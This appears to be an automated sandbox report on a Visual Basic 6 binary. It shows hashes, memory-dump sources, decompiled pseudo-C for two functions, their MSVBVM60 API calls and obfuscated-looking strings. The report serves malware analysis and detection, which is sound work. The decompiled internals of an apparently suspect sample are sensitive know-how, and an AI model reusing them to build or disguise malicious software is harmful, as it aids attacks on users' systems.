Instruction ID: 6da00c1a0ed60ae74e8c9888b3f94be7ed12b2614fe61ec35b5faf75ed7d8185
Opcode Fuzzy Hash: c0ab114adeadece1a4385be753c8caa600ebe1d3464b781cb5b2eab6e91abb95
Instruction Fuzzy Hash: 51B012B4216740CFCA55CF0CC0A0F5073B0F704710F8108C0E4128BB12C334EC10CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0298B8DD, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1185369693.0000000002980000.00000040.00000001.sdmp, Offset: 02980000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 0041F309, Relevance: 82.6, APIs: 42, Strings: 5, Instructions: 368
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0041F309(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v48;
				char _v52;
				char _v56;
				char _v64;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v92;
				char _v100;
				intOrPtr _v108;
				char _v116;
				intOrPtr _v124;
				char _v132;
				char _v148;
				char* _v156;
				char _v164;
				intOrPtr _v188;
				char _v196;
				char _v216;
				char _v220;
				intOrPtr* _t103;
				void* _t106;
				intOrPtr* _t107;
				void* _t108;
				char _t109;
				char* _t116;
				void* _t123;
				intOrPtr* _t124;
				void* _t125;
				signed int _t128;
				void* _t131;
				intOrPtr* _t132;
				void* _t133;
				char* _t134;
				char* _t135;
				void* _t137;
				intOrPtr* _t138;
				void* _t139;
				void* _t141;
				intOrPtr* _t142;
				void* _t143;
				intOrPtr _t181;
				void* _t182;
				intOrPtr* _t187;
				intOrPtr* _t188;
				intOrPtr* _t191;
				intOrPtr* _t192;
				intOrPtr* _t194;
				intOrPtr* _t195;
				intOrPtr* _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				void* _t203;
				void* _t205;
				intOrPtr _t206;
				intOrPtr _t212;
				void* _t214;
				intOrPtr _t216;
				intOrPtr _t219;
				intOrPtr _t222;
				intOrPtr _t227;
				intOrPtr _t230;

				_t206 = _t205 - 0xc;
				 *[fs:0x0] = _t206;
				_v16 = _t206 - 0xe8;
				_v12 = 0x401358;
				_v8 = 0;
				_t103 = _a4;
				 *((intOrPtr*)( *_t103 + 4))(_t103, __edi, __esi, __ebx,  *[fs:0x0], 0x401386, _t203);
				_t212 =  *0x4204c8; // 0x2a5e8b4
				_v28 = 0;
				_v32 = 0;
				_v48 = 0;
				_v52 = 0;
				_v56 = 0;
				_v64 = 0;
				_v68 = 0;
				_v84 = 0;
				_v100 = 0;
				_v116 = 0;
				_v132 = 0;
				_v148 = 0;
				_v164 = 0;
				_v196 = 0;
				_v216 = 0;
				_v220 = 0;
				if(_t212 == 0) {
					_push(0x4204c8);
					_push(0x41b418);
					L00401536();
				}
				_t187 =  *0x4204c8; // 0x2a5e8b4
				_t106 =  *((intOrPtr*)( *_t187 + 0x14))(_t187,  &_v68);
				asm("fclex");
				if(_t106 < 0) {
					_push(0x14);
					_push(0x41b408);
					_push(_t187);
					_push(_t106);
					L00401530();
				}
				_t107 = _v68;
				_t188 = _t107;
				_t108 =  *((intOrPtr*)( *_t107 + 0xd0))(_t107,  &_v64);
				asm("fclex");
				_t214 = _t108;
				if(_t214 < 0) {
					_push(0xd0);
					_push(0x41b428);
					_push(_t188);
					_push(_t108);
					L00401530();
				}
				_v64 = 0;
				L0040155A();
				L0040152A();
				_t181 = 5;
				_t109 = 2;
				_v132 = _t109;
				_v116 = _t109;
				_v100 = _t109;
				_v84 = _t109;
				_push( &_v132);
				_push( &_v116);
				_push( &_v100);
				_push( &_v84);
				_push( &_v148);
				_v124 = _t181;
				_v108 = 0x63;
				_v92 = 0;
				_v76 = 0x64;
				L00401416();
				_push( &_v148);
				_t116 =  &_v64;
				_push(_t116);
				L0040141C();
				_push(_t116);
				L00401422();
				L00401428();
				asm("fcomp qword [0x401350]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t214 != 0) {
					_push(1);
					_pop(0);
				}
				L00401512();
				_push( &_v148);
				_push( &_v132);
				_push( &_v116);
				_push( &_v100);
				_push( &_v84);
				_push(_t181);
				L004014F4();
				if( ~0x00000000 != 0) {
					_t216 =  *0x4204c8; // 0x2a5e8b4
					if(_t216 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t197 =  *0x4204c8; // 0x2a5e8b4
					_t137 =  *((intOrPtr*)( *_t197 + 0x14))(_t197,  &_v68);
					asm("fclex");
					if(_t137 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t197);
						_push(_t137);
						L00401530();
					}
					_t138 = _v68;
					_t198 = _t138;
					_t139 =  *((intOrPtr*)( *_t138 + 0xd0))(_t138,  &_v64);
					asm("fclex");
					if(_t139 < 0) {
						_push(0xd0);
						_push(0x41b428);
						_push(_t198);
						_push(_t139);
						L00401530();
					}
					_v64 = 0;
					L0040155A();
					L0040152A();
					_t219 =  *0x4204c8; // 0x2a5e8b4
					if(_t219 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t199 =  *0x4204c8; // 0x2a5e8b4
					_t141 =  *((intOrPtr*)( *_t199 + 0x14))(_t199,  &_v68);
					asm("fclex");
					if(_t141 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t199);
						_push(_t141);
						L00401530();
					}
					_t142 = _v68;
					_t200 = _t142;
					_t143 =  *((intOrPtr*)( *_t142 + 0xc0))(_t142,  &_v216);
					asm("fclex");
					if(_t143 < 0) {
						_push(0xc0);
						_push(0x41b428);
						_push(_t200);
						_push(_t143);
						L00401530();
					}
					L0040152A();
					_v156 = L"forforstrkningens";
					_v164 = 8;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v188 = 0x4397f6;
					_v196 = 3;
					asm("movsd");
					asm("movsd");
					_push(2);
					asm("movsd");
					_push(L"DmVT9pgGFqNDsn9ajKta210");
					_push(_v52);
					asm("movsd");
					L004014A0();
				}
				_t222 =  *0x4204c8; // 0x2a5e8b4
				if(_t222 != 0) {
					_t182 = 0x41b418;
				} else {
					_push(0x4204c8);
					_t182 = 0x41b418;
					_push(0x41b418);
					L00401536();
				}
				_t191 =  *0x4204c8; // 0x2a5e8b4
				_t123 =  *((intOrPtr*)( *_t191 + 0x14))(_t191,  &_v68);
				asm("fclex");
				if(_t123 < 0) {
					_push(0x14);
					_push(0x41b408);
					_push(_t191);
					_push(_t123);
					L00401530();
				}
				_t124 = _v68;
				_t192 = _t124;
				_t125 =  *((intOrPtr*)( *_t124 + 0x100))(_t124,  &_v220);
				asm("fclex");
				if(_t125 < 0) {
					_push(0x100);
					_push(0x41b428);
					_push(_t192);
					_push(_t125);
					L00401530();
				}
				_t128 =  ~(0 | _v220 != 0x00400000);
				L0040152A();
				if(_t128 != 0) {
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v84);
					_v76 = 0x17;
					_v84 = 2;
					L004014E2();
					L0040155A();
					L00401548();
					_t227 =  *0x4204c8; // 0x2a5e8b4
					if(_t227 == 0) {
						_push(0x4204c8);
						_push(_t182);
						L00401536();
					}
					_t194 =  *0x4204c8; // 0x2a5e8b4
					_t131 =  *((intOrPtr*)( *_t194 + 0x14))(_t194,  &_v68);
					asm("fclex");
					if(_t131 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t194);
						_push(_t131);
						L00401530();
					}
					_t132 = _v68;
					_t195 = _t132;
					_t133 =  *((intOrPtr*)( *_t132 + 0x138))(_t132, L"ONIONIZEDS", 1);
					asm("fclex");
					if(_t133 < 0) {
						_push(0x138);
						_push(0x41b428);
						_push(_t195);
						_push(_t133);
						L00401530();
					}
					L0040152A();
					_t230 =  *0x4204c8; // 0x2a5e8b4
					if(_t230 == 0) {
						_push(0x4204c8);
						_push(_t182);
						L00401536();
					}
					_t196 =  *0x4204c8; // 0x2a5e8b4
					_t134 =  &_v48;
					L004014D6();
					_t135 =  &_v68;
					L004014DC();
					_t128 =  *((intOrPtr*)( *_t196 + 0x10))(_t196, _t135, _t135, _t134, _t134);
					asm("fclex");
					if(_t128 < 0) {
						_push(0x10);
						_push(0x41b408);
						_push(_t196);
						_push(_t128);
						L00401530();
					}
					L0040152A();
				}
				asm("wait");
				_push(0x41f7c0);
				L00401512();
				L00401512();
				L00401548();
				L0040152A();
				L00401512();
				return _t128;
			}

0x0041f30c
0x0041f31b
0x0041f32b
0x0041f32e
0x0041f337
0x0041f33a
0x0041f340
0x0041f343
0x0041f349
0x0041f34c
0x0041f34f
0x0041f352
0x0041f355
0x0041f358
0x0041f35b
0x0041f35e
0x0041f361
0x0041f364
0x0041f367
0x0041f36a
0x0041f370
0x0041f376
0x0041f37c
0x0041f382
0x0041f388
0x0041f38a
0x0041f38f
0x0041f394
0x0041f394
0x0041f399
0x0041f3a6
0x0041f3a9
0x0041f3ad
0x0041f3af
0x0041f3b1
0x0041f3b6
0x0041f3b7
0x0041f3b8
0x0041f3b8
0x0041f3bd
0x0041f3c7
0x0041f3c9
0x0041f3cf
0x0041f3d1
0x0041f3d3
0x0041f3d5
0x0041f3da
0x0041f3df
0x0041f3e0
0x0041f3e1
0x0041f3e1
0x0041f3ec
0x0041f3ef
0x0041f3f7
0x0041f3fe
0x0041f401
0x0041f402
0x0041f405
0x0041f408
0x0041f40b
0x0041f411
0x0041f415
0x0041f419
0x0041f41d
0x0041f424
0x0041f425
0x0041f428
0x0041f42f
0x0041f432
0x0041f439
0x0041f444
0x0041f445
0x0041f448
0x0041f449
0x0041f44e
0x0041f44f
0x0041f454
0x0041f459
0x0041f45f
0x0041f461
0x0041f462
0x0041f464
0x0041f466
0x0041f466
0x0041f46e
0x0041f479
0x0041f47d
0x0041f481
0x0041f485
0x0041f489
0x0041f48a
0x0041f48b
0x0041f498
0x0041f49e
0x0041f4a4
0x0041f4a6
0x0041f4ab
0x0041f4b0
0x0041f4b0
0x0041f4b5
0x0041f4c2
0x0041f4c5
0x0041f4c9
0x0041f4cb
0x0041f4cd
0x0041f4d2
0x0041f4d3
0x0041f4d4
0x0041f4d4
0x0041f4d9
0x0041f4e3
0x0041f4e5
0x0041f4eb
0x0041f4ef
0x0041f4f1
0x0041f4f6
0x0041f4fb
0x0041f4fc
0x0041f4fd
0x0041f4fd
0x0041f508
0x0041f50b
0x0041f513
0x0041f518
0x0041f51e
0x0041f520
0x0041f525
0x0041f52a
0x0041f52a
0x0041f52f
0x0041f53c
0x0041f53f
0x0041f543
0x0041f545
0x0041f547
0x0041f54c
0x0041f54d
0x0041f54e
0x0041f54e
0x0041f553
0x0041f560
0x0041f562
0x0041f568
0x0041f56c
0x0041f56e
0x0041f573
0x0041f578
0x0041f579
0x0041f57a
0x0041f57a
0x0041f582
0x0041f58c
0x0041f596
0x0041f5a6
0x0041f5a7
0x0041f5a8
0x0041f5a9
0x0041f5af
0x0041f5b9
0x0041f5c9
0x0041f5ca
0x0041f5cb
0x0041f5cd
0x0041f5ce
0x0041f5d3
0x0041f5d6
0x0041f5d7
0x0041f5dc
0x0041f5df
0x0041f5e5
0x0041f5f9
0x0041f5e7
0x0041f5e7
0x0041f5ec
0x0041f5f1
0x0041f5f2
0x0041f5f2
0x0041f5fe
0x0041f60b
0x0041f60e
0x0041f612
0x0041f614
0x0041f616
0x0041f61b
0x0041f61c
0x0041f61d
0x0041f61d
0x0041f622
0x0041f62f
0x0041f631
0x0041f637
0x0041f63b
0x0041f63d
0x0041f642
0x0041f647
0x0041f648
0x0041f649
0x0041f649
0x0041f660
0x0041f664
0x0041f66c
0x0041f672
0x0041f674
0x0041f676
0x0041f678
0x0041f67d
0x0041f67e
0x0041f685
0x0041f68c
0x0041f696
0x0041f69e
0x0041f6a3
0x0041f6a9
0x0041f6ab
0x0041f6b0
0x0041f6b1
0x0041f6b1
0x0041f6b6
0x0041f6c3
0x0041f6c6
0x0041f6ca
0x0041f6cc
0x0041f6ce
0x0041f6d3
0x0041f6d4
0x0041f6d5
0x0041f6d5
0x0041f6da
0x0041f6e7
0x0041f6e9
0x0041f6ef
0x0041f6f3
0x0041f6f5
0x0041f6fa
0x0041f6ff
0x0041f700
0x0041f701
0x0041f701
0x0041f709
0x0041f70e
0x0041f714
0x0041f716
0x0041f71b
0x0041f71c
0x0041f71c
0x0041f721
0x0041f729
0x0041f72d
0x0041f733
0x0041f737
0x0041f73e
0x0041f741
0x0041f745
0x0041f747
0x0041f749
0x0041f74e
0x0041f74f
0x0041f750
0x0041f750
0x0041f758
0x0041f758
0x0041f75d
0x0041f75e
0x0041f79a
0x0041f7a2
0x0041f7aa
0x0041f7b2
0x0041f7ba
0x0041f7bf

APIs

__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041F394
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041F3B8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F3E1
__vbaStrMove.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F3EF
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F3F7
#664.MSVBVM60(?,?,?,?,?), ref: 0041F439
__vbaStrVarVal.MSVBVM60(?,?,?,?,?,?,?), ref: 0041F449
#581.MSVBVM60(00000000,?,?,?,?,?,?,?), ref: 0041F44F
__vbaFpR8.MSVBVM60(00000000,?,?,?,?,?,?,?), ref: 0041F454
__vbaFreeStr.MSVBVM60(00000000,?,?,?,?,?,?,?), ref: 0041F46E
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 0041F48B
__vbaNew2.MSVBVM60(0041B418,004204C8,?,?,?), ref: 0041F4B0
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041F4D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F4FD
__vbaStrMove.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F50B
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,000000D0), ref: 0041F513
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041F52A
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041F54E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,000000C0), ref: 0041F57A
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,000000C0), ref: 0041F582
__vbaLateMemCall.MSVBVM60(?,DmVT9pgGFqNDsn9ajKta210,00000002), ref: 0041F5D7
__vbaNew2.MSVBVM60(0041B418,004204C8,?,?,?), ref: 0041F5F2
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041F61D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000100), ref: 0041F649
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000100), ref: 0041F664
#702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041F68C
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041F696
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041F69E
__vbaNew2.MSVBVM60(0041B418,004204C8,?,000000FF,000000FE,000000FE,000000FE), ref: 0041F6B1
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041F6D5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041F701
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041F709
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041F71C
__vbaObjVar.MSVBVM60(?), ref: 0041F72D
__vbaObjSetAddref.MSVBVM60(?,00000000,?), ref: 0041F737
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000010), ref: 0041F750
__vbaFreeObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000010), ref: 0041F758
__vbaFreeStr.MSVBVM60(0041F7C0), ref: 0041F79A
__vbaFreeStr.MSVBVM60(0041F7C0), ref: 0041F7A2
__vbaFreeVar.MSVBVM60(0041F7C0), ref: 0041F7AA
__vbaFreeObj.MSVBVM60(0041F7C0), ref: 0041F7B2
__vbaFreeStr.MSVBVM60(0041F7C0), ref: 0041F7BA

Strings

d, xrefs: 0041F432
c, xrefs: 0041F428
DmVT9pgGFqNDsn9ajKta210, xrefs: 0041F5CE
forforstrkningens, xrefs: 0041F58C
ONIONIZEDS, xrefs: 0041F6E1

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#581#664#702AddrefCallLateList
String ID: DmVT9pgGFqNDsn9ajKta210$ONIONIZEDS$c$d$forforstrkningens
API String ID: 2422093951-1275962348
Opcode ID: 6347b7ea17aeaf2c4af8bce04a0d9e145223f13984e725256debe264cc04162d
Instruction ID: b9e6317a87725c06180aa51f2d998c0f3a1c63971b9a59d6d972fb58f686cd22
Opcode Fuzzy Hash: 6347b7ea17aeaf2c4af8bce04a0d9e145223f13984e725256debe264cc04162d
Instruction Fuzzy Hash: CED13E71900228ABCB10EFA5DC85EDEB7B8BF44304F54417EF105BB1A2DB7859468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E120, Relevance: 63.3, APIs: 34, Strings: 2, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041E120(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				void* _v64;
				intOrPtr _v72;
				char _v80;
				char _v100;
				char _v104;
				intOrPtr* _t60;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;
				char* _t72;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				void* _t78;
				intOrPtr* _t79;
				void* _t82;
				intOrPtr* _t83;
				void* _t84;
				char* _t85;
				char* _t86;
				void* _t87;
				intOrPtr* _t89;
				char _t120;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t129;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t134;
				intOrPtr* _t135;
				void* _t136;
				void* _t138;
				intOrPtr _t139;
				intOrPtr _t142;

				_t139 = _t138 - 0xc;
				 *[fs:0x0] = _t139;
				_v16 = _t139 - 0x6c;
				_v12 = 0x4012b0;
				_v8 = 0;
				_t60 = _a4;
				 *((intOrPtr*)( *_t60 + 4))(_t60, __edi, __esi, __ebx,  *[fs:0x0], 0x401386, _t136);
				_t142 =  *0x4204c8; // 0x2a5e8b4
				_v44 = 0;
				_v52 = 0;
				_v56 = 0;
				_v60 = 0;
				_v64 = 0;
				_v80 = 0;
				_v100 = 0;
				_v104 = 0;
				_t89 = 0x4204c8;
				if(_t142 == 0) {
					_push(0x4204c8);
					_push(0x41b418);
					L00401536();
				}
				_t122 =  *0x4204c8; // 0x2a5e8b4
				_t63 =  *((intOrPtr*)( *_t122 + 0x14))(_t122,  &_v64);
				asm("fclex");
				if(_t63 < 0) {
					_push(0x14);
					_push(0x41b408);
					_push(_t122);
					_push(_t63);
					L00401530();
				}
				_t64 = _v64;
				_t123 = _t64;
				_t65 =  *((intOrPtr*)( *_t64 + 0x100))(_t64,  &_v104);
				asm("fclex");
				if(_t65 < 0) {
					_push(0x100);
					_push(0x41b428);
					_push(_t123);
					_push(_t65);
					L00401530();
				}
				L0040152A();
				if( ~(0 | _v104 != 0x00400000) == 0) {
					_t120 = 2;
				} else {
					_t120 = 2;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v80);
					_v72 = 0x17;
					_v80 = _t120;
					L004014E2();
					L0040155A();
					L00401548();
					if( *0x4204c8 == 0) {
						_push(_t89);
						_push(0x41b418);
						L00401536();
					}
					_t133 =  *0x4204c8; // 0x2a5e8b4
					_t82 =  *((intOrPtr*)( *_t133 + 0x14))(_t133,  &_v64);
					asm("fclex");
					if(_t82 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t133);
						_push(_t82);
						L00401530();
					}
					_t83 = _v64;
					_t134 = _t83;
					_t84 =  *((intOrPtr*)( *_t83 + 0x138))(_t83, L"Septuagenarian", 1);
					asm("fclex");
					if(_t84 < 0) {
						_push(0x138);
						_push(0x41b428);
						_push(_t134);
						_push(_t84);
						L00401530();
					}
					L0040152A();
					if( *0x4204c8 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t135 =  *0x4204c8; // 0x2a5e8b4
					_t85 =  &_v44;
					L004014D6();
					_t86 =  &_v64;
					L004014DC();
					_t87 =  *((intOrPtr*)( *_t135 + 0x10))(_t135, _t86, _t86, _t85, _t85);
					asm("fclex");
					if(_t87 < 0) {
						_push(0x10);
						_push(0x41b408);
						_push(_t135);
						_push(_t87);
						L00401530();
					}
					L0040152A();
					_t89 = 0x4204c8;
				}
				_push( &_v80);
				_push(1);
				_push(0x41b580);
				_push(0x41b580);
				_v72 = _t120;
				_v80 = _t120;
				L004014FA();
				L0040155A();
				_push(0x41b580);
				L004014D0();
				L0040155A();
				_push(0x41b580);
				_push(0x41b58c);
				L004014EE();
				_push( &_v60);
				asm("sbb esi, esi");
				_t72 =  &_v56;
				_push(_t72);
				_push(_t120);
				L004014CA();
				L00401548();
				if( ~( ~( ~0x41b580)) != 0) {
					if( *0x4204c8 == 0) {
						_push(_t89);
						_push(0x41b418);
						L00401536();
					}
					_t129 =  *0x4204c8; // 0x2a5e8b4
					_t74 =  *((intOrPtr*)( *_t129 + 0x14))(_t129,  &_v64);
					asm("fclex");
					if(_t74 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t129);
						_push(_t74);
						L00401530();
					}
					_t75 = _v64;
					_t130 = _t75;
					_t76 =  *((intOrPtr*)( *_t75 + 0x78))(_t75,  &_v100);
					asm("fclex");
					if(_t76 < 0) {
						_push(0x78);
						_push(0x41b428);
						_push(_t130);
						_push(_t76);
						L00401530();
					}
					L0040152A();
					if( *0x4204c8 == 0) {
						_push(_t89);
						_push(0x41b418);
						L00401536();
					}
					_t131 =  *0x4204c8; // 0x2a5e8b4
					_t78 =  *((intOrPtr*)( *_t131 + 0x14))(_t131,  &_v64);
					asm("fclex");
					if(_t78 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t131);
						_push(_t78);
						L00401530();
					}
					_t79 = _v64;
					_t132 = _t79;
					_t72 =  *((intOrPtr*)( *_t79 + 0xb8))(_t79,  &_v100);
					asm("fclex");
					if(_t72 < 0) {
						_push(0xb8);
						_push(0x41b428);
						_push(_t132);
						_push(_t72);
						L00401530();
					}
					L0040152A();
					_push(L"Finalt7");
					_push(0xc3);
					_push(0xffffffff);
					_push(0x20);
					L004014C4();
				}
				_push(0x41e472);
				L00401548();
				L00401512();
				return _t72;
			}

0x0041e123
0x0041e132
0x0041e13f
0x0041e142
0x0041e14b
0x0041e14e
0x0041e154
0x0041e157
0x0041e15d
0x0041e160
0x0041e163
0x0041e166
0x0041e169
0x0041e16c
0x0041e16f
0x0041e172
0x0041e175
0x0041e17a
0x0041e17c
0x0041e17d
0x0041e182
0x0041e182
0x0041e187
0x0041e194
0x0041e197
0x0041e19b
0x0041e19d
0x0041e19f
0x0041e1a4
0x0041e1a5
0x0041e1a6
0x0041e1a6
0x0041e1ab
0x0041e1b5
0x0041e1b7
0x0041e1bd
0x0041e1c1
0x0041e1c3
0x0041e1c8
0x0041e1cd
0x0041e1ce
0x0041e1cf
0x0041e1cf
0x0041e1e7
0x0041e1ef
0x0041e2ee
0x0041e1f5
0x0041e1f7
0x0041e1f8
0x0041e1fa
0x0041e1fc
0x0041e1fe
0x0041e203
0x0041e204
0x0041e20b
0x0041e20e
0x0041e218
0x0041e220
0x0041e22c
0x0041e22e
0x0041e22f
0x0041e234
0x0041e234
0x0041e239
0x0041e246
0x0041e249
0x0041e24d
0x0041e24f
0x0041e251
0x0041e256
0x0041e257
0x0041e258
0x0041e258
0x0041e25d
0x0041e26a
0x0041e26c
0x0041e272
0x0041e276
0x0041e278
0x0041e27d
0x0041e282
0x0041e283
0x0041e284
0x0041e284
0x0041e28c
0x0041e298
0x0041e29a
0x0041e29f
0x0041e2a4
0x0041e2a4
0x0041e2a9
0x0041e2b1
0x0041e2b5
0x0041e2bb
0x0041e2bf
0x0041e2c6
0x0041e2c9
0x0041e2cd
0x0041e2cf
0x0041e2d1
0x0041e2d6
0x0041e2d7
0x0041e2d8
0x0041e2d8
0x0041e2e0
0x0041e2e5
0x0041e2e5
0x0041e2f2
0x0041e2f3
0x0041e2fa
0x0041e2fb
0x0041e2fc
0x0041e2ff
0x0041e302
0x0041e30c
0x0041e311
0x0041e312
0x0041e31c
0x0041e321
0x0041e322
0x0041e327
0x0041e331
0x0041e334
0x0041e336
0x0041e339
0x0041e33c
0x0041e33f
0x0041e34a
0x0041e352
0x0041e35f
0x0041e361
0x0041e362
0x0041e367
0x0041e367
0x0041e36c
0x0041e379
0x0041e37c
0x0041e380
0x0041e382
0x0041e384
0x0041e389
0x0041e38a
0x0041e38b
0x0041e38b
0x0041e390
0x0041e39a
0x0041e39c
0x0041e39f
0x0041e3a3
0x0041e3a5
0x0041e3a7
0x0041e3ac
0x0041e3ad
0x0041e3ae
0x0041e3ae
0x0041e3b6
0x0041e3c2
0x0041e3c4
0x0041e3c5
0x0041e3ca
0x0041e3ca
0x0041e3cf
0x0041e3dc
0x0041e3df
0x0041e3e3
0x0041e3e5
0x0041e3e7
0x0041e3ec
0x0041e3ed
0x0041e3ee
0x0041e3ee
0x0041e3f3
0x0041e3fd
0x0041e3ff
0x0041e405
0x0041e409
0x0041e40b
0x0041e410
0x0041e415
0x0041e416
0x0041e417
0x0041e417
0x0041e41f
0x0041e424
0x0041e429
0x0041e42e
0x0041e430
0x0041e432
0x0041e432
0x0041e437
0x0041e464
0x0041e46c
0x0041e471

APIs

__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041E182
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E1A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000100), ref: 0041E1CF
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000100), ref: 0041E1E7
#702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041E20E
__vbaStrMove.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041E218
__vbaFreeVar.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041E220
__vbaNew2.MSVBVM60(0041B418,004204C8,?,000000FF,000000FE,000000FE,000000FE), ref: 0041E234
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E258
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E284
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E28C
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041E2A4
__vbaObjVar.MSVBVM60(?), ref: 0041E2B5
__vbaObjSetAddref.MSVBVM60(?,00000000,?), ref: 0041E2BF
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000010), ref: 0041E2D8
__vbaFreeObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000010), ref: 0041E2E0
__vbaStrCat.MSVBVM60(0041B580,0041B580,00000001,?), ref: 0041E302
__vbaStrMove.MSVBVM60(0041B580,0041B580,00000001,?), ref: 0041E30C
#628.MSVBVM60(00000000,0041B580,0041B580,00000001,?), ref: 0041E312
__vbaStrMove.MSVBVM60(00000000,0041B580,0041B580,00000001,?), ref: 0041E31C
__vbaStrCmp.MSVBVM60(0041B58C,00000000,00000000,0041B580,0041B580,00000001,?), ref: 0041E327
__vbaFreeStrList.MSVBVM60(00000002,?,?,0041B58C,00000000,00000000,0041B580,0041B580,00000001,?), ref: 0041E33F
__vbaFreeVar.MSVBVM60 ref: 0041E34A
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041E367
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E38B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000078), ref: 0041E3AE
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000078), ref: 0041E3B6
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041E3CA
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E3EE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,000000B8), ref: 0041E417
